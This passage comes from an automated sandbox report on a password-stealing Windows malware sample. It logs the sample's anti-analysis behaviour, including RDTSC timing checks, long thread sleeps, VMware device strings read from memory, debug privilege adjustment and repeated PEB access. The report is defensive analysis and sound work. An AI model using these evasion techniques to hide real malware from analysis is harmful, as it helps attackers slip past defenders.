          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000E79904 second address: 0000000000E7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000E79B7E second address: 0000000000E79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe TID: 6916Thread sleep time: -34627s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe TID: 6876Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2892Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe TID: 7008Thread sleep time: -34627s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe TID: 5040Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6196Thread sleep count: 50 > 30
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6196Thread sleep time: -100000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_00409AB0 rdtsc 10_2_00409AB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9352Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9450Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 863
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 838
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeAPI coverage: 1.5 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeThread delayed: delay time: 34627Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeThread delayed: delay time: 34627Jump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000F.00000000.451928214.00000000008B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
          Source: explorer.exe, 0000000F.00000003.581521164.0000000008644000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000F.00000003.554148817.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 0000000F.00000000.470103490.000000000F03A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000003.554148817.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000000.454543147.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000003.575314509.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000F.00000003.557721629.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.581328798.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.565131674.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.568851741.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.573216031.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.578315402.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.582536071.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.584721689.000000000ECDA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWta%SystemRoot%\system32\mswsock.dll\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerCoS-z
          Source: explorer.exe, 0000000F.00000003.581521164.0000000008644000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_00409AB0 rdtsc 10_2_00409AB0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180C182 mov eax, dword ptr fs:[00000030h]10_2_0180C182
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AA189 mov eax, dword ptr fs:[00000030h]10_2_018AA189
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AA189 mov ecx, dword ptr fs:[00000030h]10_2_018AA189
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181A185 mov eax, dword ptr fs:[00000030h]10_2_0181A185
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EB171 mov eax, dword ptr fs:[00000030h]10_2_017EB171
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EB171 mov eax, dword ptr fs:[00000030h]10_2_017EB171
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812990 mov eax, dword ptr fs:[00000030h]10_2_01812990
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814190 mov eax, dword ptr fs:[00000030h]10_2_01814190
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EC962 mov eax, dword ptr fs:[00000030h]10_2_017EC962
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018669A6 mov eax, dword ptr fs:[00000030h]10_2_018669A6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E395E mov eax, dword ptr fs:[00000030h]10_2_017E395E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E395E mov eax, dword ptr fs:[00000030h]10_2_017E395E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018161A0 mov eax, dword ptr fs:[00000030h]10_2_018161A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018161A0 mov eax, dword ptr fs:[00000030h]10_2_018161A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A49A4 mov eax, dword ptr fs:[00000030h]10_2_018A49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A49A4 mov eax, dword ptr fs:[00000030h]10_2_018A49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A49A4 mov eax, dword ptr fs:[00000030h]10_2_018A49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A49A4 mov eax, dword ptr fs:[00000030h]10_2_018A49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018651BE mov eax, dword ptr fs:[00000030h]10_2_018651BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018651BE mov eax, dword ptr fs:[00000030h]10_2_018651BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018651BE mov eax, dword ptr fs:[00000030h]10_2_018651BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018651BE mov eax, dword ptr fs:[00000030h]10_2_018651BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov ecx, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov ecx, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov eax, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov ecx, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov ecx, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov eax, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov ecx, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov ecx, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov eax, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov ecx, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov ecx, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF mov eax, dword ptr fs:[00000030h]10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E3138 mov ecx, dword ptr fs:[00000030h]10_2_017E3138
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A19D8 mov eax, dword ptr fs:[00000030h]10_2_018A19D8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B89E7 mov eax, dword ptr fs:[00000030h]10_2_018B89E7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018741E8 mov eax, dword ptr fs:[00000030h]10_2_018741E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9100 mov eax, dword ptr fs:[00000030h]10_2_017E9100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9100 mov eax, dword ptr fs:[00000030h]10_2_017E9100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E9100 mov eax, dword ptr fs:[00000030h]10_2_017E9100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F0100 mov eax, dword ptr fs:[00000030h]10_2_017F0100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F0100 mov eax, dword ptr fs:[00000030h]10_2_017F0100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F0100 mov eax, dword ptr fs:[00000030h]10_2_017F0100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E31E0 mov eax, dword ptr fs:[00000030h]10_2_017E31E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EB1E1 mov eax, dword ptr fs:[00000030h]10_2_017EB1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EB1E1 mov eax, dword ptr fs:[00000030h]10_2_017EB1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EB1E1 mov eax, dword ptr fs:[00000030h]10_2_017EB1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01804120 mov eax, dword ptr fs:[00000030h]10_2_01804120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01804120 mov eax, dword ptr fs:[00000030h]10_2_01804120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01804120 mov eax, dword ptr fs:[00000030h]10_2_01804120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01804120 mov eax, dword ptr fs:[00000030h]10_2_01804120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01804120 mov ecx, dword ptr fs:[00000030h]10_2_01804120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181513A mov eax, dword ptr fs:[00000030h]10_2_0181513A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181513A mov eax, dword ptr fs:[00000030h]10_2_0181513A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B944 mov eax, dword ptr fs:[00000030h]10_2_0180B944
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B944 mov eax, dword ptr fs:[00000030h]10_2_0180B944
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1951 mov eax, dword ptr fs:[00000030h]10_2_018A1951
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E519E mov eax, dword ptr fs:[00000030h]10_2_017E519E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E519E mov ecx, dword ptr fs:[00000030h]10_2_017E519E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AE962 mov eax, dword ptr fs:[00000030h]10_2_018AE962
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8966 mov eax, dword ptr fs:[00000030h]10_2_018B8966
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01863884 mov eax, dword ptr fs:[00000030h]10_2_01863884
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01863884 mov eax, dword ptr fs:[00000030h]10_2_01863884
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018120A0 mov eax, dword ptr fs:[00000030h]10_2_018120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018120A0 mov eax, dword ptr fs:[00000030h]10_2_018120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018120A0 mov eax, dword ptr fs:[00000030h]10_2_018120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018120A0 mov eax, dword ptr fs:[00000030h]10_2_018120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018120A0 mov eax, dword ptr fs:[00000030h]10_2_018120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018120A0 mov eax, dword ptr fs:[00000030h]10_2_018120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E7057 mov eax, dword ptr fs:[00000030h]10_2_017E7057
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018290AF mov eax, dword ptr fs:[00000030h]10_2_018290AF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5050 mov eax, dword ptr fs:[00000030h]10_2_017E5050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5050 mov eax, dword ptr fs:[00000030h]10_2_017E5050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5050 mov eax, dword ptr fs:[00000030h]10_2_017E5050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181F0BF mov ecx, dword ptr fs:[00000030h]10_2_0181F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181F0BF mov eax, dword ptr fs:[00000030h]10_2_0181F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181F0BF mov eax, dword ptr fs:[00000030h]10_2_0181F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A18CA mov eax, dword ptr fs:[00000030h]10_2_018A18CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB02A mov eax, dword ptr fs:[00000030h]10_2_017FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB02A mov eax, dword ptr fs:[00000030h]10_2_017FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB02A mov eax, dword ptr fs:[00000030h]10_2_017FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB02A mov eax, dword ptr fs:[00000030h]10_2_017FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov ecx, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B8E4 mov eax, dword ptr fs:[00000030h]10_2_0180B8E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B8E4 mov eax, dword ptr fs:[00000030h]10_2_0180B8E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6800 mov eax, dword ptr fs:[00000030h]10_2_017E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6800 mov eax, dword ptr fs:[00000030h]10_2_017E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6800 mov eax, dword ptr fs:[00000030h]10_2_017E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28FD mov eax, dword ptr fs:[00000030h]10_2_017F28FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28FD mov eax, dword ptr fs:[00000030h]10_2_017F28FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F28FD mov eax, dword ptr fs:[00000030h]10_2_017F28FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01867016 mov eax, dword ptr fs:[00000030h]10_2_01867016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01867016 mov eax, dword ptr fs:[00000030h]10_2_01867016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01867016 mov eax, dword ptr fs:[00000030h]10_2_01867016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E58EC mov eax, dword ptr fs:[00000030h]10_2_017E58EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B4015 mov eax, dword ptr fs:[00000030h]10_2_018B4015
